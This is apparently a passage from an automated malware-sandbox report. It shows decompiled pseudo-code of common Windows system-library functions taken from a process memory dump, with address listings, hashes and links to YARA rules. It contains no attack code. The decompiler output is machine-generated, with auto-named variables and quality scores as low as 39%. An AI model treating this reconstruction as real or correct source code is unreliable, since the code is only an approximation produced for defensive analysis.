										L030E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0310F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E031013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L030E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03109650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                                                                                    0x030cc608
                                                                                                                                                    0x030cc615
                                                                                                                                                    0x030cc625
                                                                                                                                                    0x030cc62d
                                                                                                                                                    0x030cc635
                                                                                                                                                    0x030cc640
                                                                                                                                                    0x030cc680
                                                                                                                                                    0x030cc687
                                                                                                                                                    0x030cc688
                                                                                                                                                    0x030cc689
                                                                                                                                                    0x030cc694
                                                                                                                                                    0x030cc694
                                                                                                                                                    0x030cc642
                                                                                                                                                    0x030cc64a
                                                                                                                                                    0x030cc697
                                                                                                                                                    0x03137a25
                                                                                                                                                    0x03137a2b
                                                                                                                                                    0x03137a2e
                                                                                                                                                    0x03137a30
                                                                                                                                                    0x03137bea
                                                                                                                                                    0x03137bea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137bea
                                                                                                                                                    0x03137a36
                                                                                                                                                    0x03137a43
                                                                                                                                                    0x03137a48
                                                                                                                                                    0x03137a4c
                                                                                                                                                    0x03137a4e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137a58
                                                                                                                                                    0x03137a5a
                                                                                                                                                    0x03137a5b
                                                                                                                                                    0x03137a5c
                                                                                                                                                    0x03137a5d
                                                                                                                                                    0x03137a63
                                                                                                                                                    0x03137a64
                                                                                                                                                    0x03137a6a
                                                                                                                                                    0x03137a6c
                                                                                                                                                    0x03137a6e
                                                                                                                                                    0x031379cb
                                                                                                                                                    0x031379cb
                                                                                                                                                    0x031379ce
                                                                                                                                                    0x031379d0
                                                                                                                                                    0x03137a98
                                                                                                                                                    0x03137a9b
                                                                                                                                                    0x03137a9b
                                                                                                                                                    0x03137a9e
                                                                                                                                                    0x03137aa1
                                                                                                                                                    0x03137bbe
                                                                                                                                                    0x03137bbe
                                                                                                                                                    0x03137bc0
                                                                                                                                                    0x03137be0
                                                                                                                                                    0x03137be0
                                                                                                                                                    0x03137a01
                                                                                                                                                    0x03137a01
                                                                                                                                                    0x03137a05
                                                                                                                                                    0x03137a07
                                                                                                                                                    0x03137a15
                                                                                                                                                    0x03137a15
                                                                                                                                                    0x03137a1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137a1a
                                                                                                                                                    0x03137bc2
                                                                                                                                                    0x03137bc6
                                                                                                                                                    0x03137bc9
                                                                                                                                                    0x03137bcd
                                                                                                                                                    0x03137bcf
                                                                                                                                                    0x031379e6
                                                                                                                                                    0x031379e6
                                                                                                                                                    0x031379eb
                                                                                                                                                    0x031379eb
                                                                                                                                                    0x031379ef
                                                                                                                                                    0x031379f1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031379f3
                                                                                                                                                    0x031379f5
                                                                                                                                                    0x031379ff
                                                                                                                                                    0x031379ff
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031379ff
                                                                                                                                                    0x031379f7
                                                                                                                                                    0x031379fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031379fd
                                                                                                                                                    0x03137bd5
                                                                                                                                                    0x03137bd8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137ba9
                                                                                                                                                    0x03137bac
                                                                                                                                                    0x03137bb0
                                                                                                                                                    0x03137bb1
                                                                                                                                                    0x03137bb1
                                                                                                                                                    0x03137bb6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137bb6
                                                                                                                                                    0x03137aa7
                                                                                                                                                    0x03137aaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137ab2
                                                                                                                                                    0x03137ab3
                                                                                                                                                    0x03137ab5
                                                                                                                                                    0x03137aec
                                                                                                                                                    0x03137aef
                                                                                                                                                    0x03137b25
                                                                                                                                                    0x03137b28
                                                                                                                                                    0x03137b62
                                                                                                                                                    0x03137b64
                                                                                                                                                    0x03137b8f
                                                                                                                                                    0x03137b92
                                                                                                                                                    0x03137b96
                                                                                                                                                    0x03137b98
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b9e
                                                                                                                                                    0x03137b9f
                                                                                                                                                    0x03137ba3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137ba3
                                                                                                                                                    0x03137b66
                                                                                                                                                    0x03137b68
                                                                                                                                                    0x03137ae2
                                                                                                                                                    0x03137ae2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137ae2
                                                                                                                                                    0x03137b6e
                                                                                                                                                    0x03137b72
                                                                                                                                                    0x03137b75
                                                                                                                                                    0x03137b81
                                                                                                                                                    0x03137b85
                                                                                                                                                    0x03137b87
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b31
                                                                                                                                                    0x03137b34
                                                                                                                                                    0x03137b3c
                                                                                                                                                    0x03137b45
                                                                                                                                                    0x03137b46
                                                                                                                                                    0x03137b4f
                                                                                                                                                    0x03137b51
                                                                                                                                                    0x03137b57
                                                                                                                                                    0x03137b59
                                                                                                                                                    0x03137b59
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b59
                                                                                                                                                    0x03137b77
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b77
                                                                                                                                                    0x03137b2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b2a
                                                                                                                                                    0x03137af1
                                                                                                                                                    0x03137af3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137afb
                                                                                                                                                    0x03137afc
                                                                                                                                                    0x03137afe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b00
                                                                                                                                                    0x03137b03
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b05
                                                                                                                                                    0x03137b09
                                                                                                                                                    0x03137b0d
                                                                                                                                                    0x03137b0f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b18
                                                                                                                                                    0x03137b1d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137b1d
                                                                                                                                                    0x03137ab7
                                                                                                                                                    0x03137ab9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137abf
                                                                                                                                                    0x03137ac1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137ac3
                                                                                                                                                    0x03137ac6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137ac8
                                                                                                                                                    0x03137acc
                                                                                                                                                    0x03137ad0
                                                                                                                                                    0x03137ad2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137adb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137adb
                                                                                                                                                    0x031379d6
                                                                                                                                                    0x031379d9
                                                                                                                                                    0x031379dc
                                                                                                                                                    0x03137a91
                                                                                                                                                    0x03137a94
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137a94
                                                                                                                                                    0x031379e2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031379e2
                                                                                                                                                    0x03137a74
                                                                                                                                                    0x03137a7a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137a8a
                                                                                                                                                    0x03137a21
                                                                                                                                                    0x03137a21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137a21
                                                                                                                                                    0x030cc650
                                                                                                                                                    0x030cc651
                                                                                                                                                    0x030cc656
                                                                                                                                                    0x030cc65c
                                                                                                                                                    0x030cc65d
                                                                                                                                                    0x030cc663
                                                                                                                                                    0x030cc664
                                                                                                                                                    0x030cc66a
                                                                                                                                                    0x030cc66e
                                                                                                                                                    0x031379c5
                                                                                                                                                    0x031379c7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031379c7
                                                                                                                                                    0x030cc67a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 9db6860c68744941fbe361266148f10c83e5b458076fc3b51228544e4ee69bb4
                                                                                                                                                    • Instruction ID: 2a83f6df8221b04828871fc39802128fcefbe2838bd9b1ec5e6ce2441334ea22
                                                                                                                                                    • Opcode Fuzzy Hash: 9db6860c68744941fbe361266148f10c83e5b458076fc3b51228544e4ee69bb4
                                                                                                                                                    • Instruction Fuzzy Hash: BD818FB56043419FDB25CE14C880A7BB3E9EB8E360F1D496AED499B284D331DD41CBA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0315B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                                    			E0315B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x31b7b9c; // 0x0
				_t124 = L030E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03109800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E031095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E031095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L030E77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03109910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E031095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x31b7b9c; // 0x0
									_t92 = L030E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03109910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E030CA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0315E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0315E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E031095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                                                                    0x0315b8d9
                                                                                                                                                    0x0315b8e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b8e6
                                                                                                                                                    0x0315b8f3
                                                                                                                                                    0x0315b8f5
                                                                                                                                                    0x0315b8f5
                                                                                                                                                    0x0315b8f8
                                                                                                                                                    0x0315b920
                                                                                                                                                    0x0315b924
                                                                                                                                                    0x0315b936
                                                                                                                                                    0x0315b939
                                                                                                                                                    0x0315b93d
                                                                                                                                                    0x0315b948
                                                                                                                                                    0x0315b9a0
                                                                                                                                                    0x0315b9a0
                                                                                                                                                    0x0315b9a4
                                                                                                                                                    0x0315b9bf
                                                                                                                                                    0x0315b9c4
                                                                                                                                                    0x0315b9c6
                                                                                                                                                    0x0315b9cd
                                                                                                                                                    0x0315b9d1
                                                                                                                                                    0x0315bad4
                                                                                                                                                    0x0315bad8
                                                                                                                                                    0x0315bada
                                                                                                                                                    0x0315badc
                                                                                                                                                    0x0315badc
                                                                                                                                                    0x0315badf
                                                                                                                                                    0x0315bae0
                                                                                                                                                    0x0315bae2
                                                                                                                                                    0x0315bae4
                                                                                                                                                    0x0315baec
                                                                                                                                                    0x0315baee
                                                                                                                                                    0x0315baf0
                                                                                                                                                    0x0315baf0
                                                                                                                                                    0x0315baec
                                                                                                                                                    0x0315bafb
                                                                                                                                                    0x0315bafc
                                                                                                                                                    0x0315bafe
                                                                                                                                                    0x0315bb01
                                                                                                                                                    0x0315bb01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315bb06
                                                                                                                                                    0x0315b9d7
                                                                                                                                                    0x0315b9db
                                                                                                                                                    0x0315b9db
                                                                                                                                                    0x0315b9de
                                                                                                                                                    0x0315b9de
                                                                                                                                                    0x0315b9e4
                                                                                                                                                    0x0315b9e7
                                                                                                                                                    0x0315b9ea
                                                                                                                                                    0x0315b9ec
                                                                                                                                                    0x0315b9ef
                                                                                                                                                    0x0315b9f3
                                                                                                                                                    0x0315ba1b
                                                                                                                                                    0x0315ba1b
                                                                                                                                                    0x0315ba23
                                                                                                                                                    0x0315ba24
                                                                                                                                                    0x0315ba27
                                                                                                                                                    0x0315ba2a
                                                                                                                                                    0x0315ba2b
                                                                                                                                                    0x0315ba2e
                                                                                                                                                    0x0315ba30
                                                                                                                                                    0x0315ba37
                                                                                                                                                    0x0315ba3f
                                                                                                                                                    0x0315ba9c
                                                                                                                                                    0x0315baa2
                                                                                                                                                    0x0315bb13
                                                                                                                                                    0x0315bb15
                                                                                                                                                    0x0315baae
                                                                                                                                                    0x0315baae
                                                                                                                                                    0x0315bab3
                                                                                                                                                    0x0315bab5
                                                                                                                                                    0x0315baba
                                                                                                                                                    0x0315bac8
                                                                                                                                                    0x0315bac8
                                                                                                                                                    0x0315baba
                                                                                                                                                    0x0315bacd
                                                                                                                                                    0x0315bacf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315bacf
                                                                                                                                                    0x0315bb1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315bb1c
                                                                                                                                                    0x0315baa7
                                                                                                                                                    0x0315bb11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315bb11
                                                                                                                                                    0x0315baa9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315ba41
                                                                                                                                                    0x0315ba41
                                                                                                                                                    0x0315ba41
                                                                                                                                                    0x0315ba58
                                                                                                                                                    0x0315ba5d
                                                                                                                                                    0x0315ba62
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315ba64
                                                                                                                                                    0x0315ba67
                                                                                                                                                    0x0315ba68
                                                                                                                                                    0x0315ba69
                                                                                                                                                    0x0315ba6c
                                                                                                                                                    0x0315ba6f
                                                                                                                                                    0x0315ba71
                                                                                                                                                    0x0315ba78
                                                                                                                                                    0x0315ba80
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315ba90
                                                                                                                                                    0x0315ba90
                                                                                                                                                    0x0315ba97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315ba97
                                                                                                                                                    0x0315b9f5
                                                                                                                                                    0x0315b9f7
                                                                                                                                                    0x0315b9f7
                                                                                                                                                    0x0315b9fa
                                                                                                                                                    0x0315ba03
                                                                                                                                                    0x0315ba07
                                                                                                                                                    0x0315ba0c
                                                                                                                                                    0x0315ba10
                                                                                                                                                    0x0315ba17
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b9f7
                                                                                                                                                    0x0315b9a6
                                                                                                                                                    0x0315b9a8
                                                                                                                                                    0x0315b9af
                                                                                                                                                    0x0315b9b3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b9b9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b9b9
                                                                                                                                                    0x0315b94d
                                                                                                                                                    0x0315b98f
                                                                                                                                                    0x0315b995
                                                                                                                                                    0x0315b999
                                                                                                                                                    0x0315b960
                                                                                                                                                    0x0315b967
                                                                                                                                                    0x0315b968
                                                                                                                                                    0x0315b96a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b96a
                                                                                                                                                    0x0315b99b
                                                                                                                                                    0x0315b99e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b99e
                                                                                                                                                    0x0315b951
                                                                                                                                                    0x0315b954
                                                                                                                                                    0x0315b95a
                                                                                                                                                    0x0315b95e
                                                                                                                                                    0x0315b972
                                                                                                                                                    0x0315b979
                                                                                                                                                    0x0315b97d
                                                                                                                                                    0x0315b97f
                                                                                                                                                    0x0315b980
                                                                                                                                                    0x0315b982
                                                                                                                                                    0x0315b984
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b984
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b926
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0315b926

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 984a0b5403f6bae1c1dbfadb6e689347627a6820dfc97fc6ae12fa035f74bad2
                                                                                                                                                    • Instruction ID: a6dc1c102928968ded566a4852f305dafa03db69e19ab5be8efcd1acf9a1bb8c
                                                                                                                                                    • Opcode Fuzzy Hash: 984a0b5403f6bae1c1dbfadb6e689347627a6820dfc97fc6ae12fa035f74bad2
                                                                                                                                                    • Instruction Fuzzy Hash: 9A712076204701EFD735DF25C841FA6BBA5EF88720F198528FA658B2E0DBB1E940CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03146DC9, Relevance: .2, Instructions: 199COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E03146DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03146B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E030E7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03109AE0();
					_t87 = L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0314795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0314795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0314795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0314795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L030E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03146B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03146B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03146B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03146B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E030E7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03109AE0();
								L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L030E2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L030E2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L030E2400( &_v52);
							}
							if(_v28 >= 0) {
								return L030E2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                                                                    0x03146dd4
                                                                                                                                                    0x03146dde
                                                                                                                                                    0x03146de1
                                                                                                                                                    0x03146de3
                                                                                                                                                    0x03146de6
                                                                                                                                                    0x03146de9
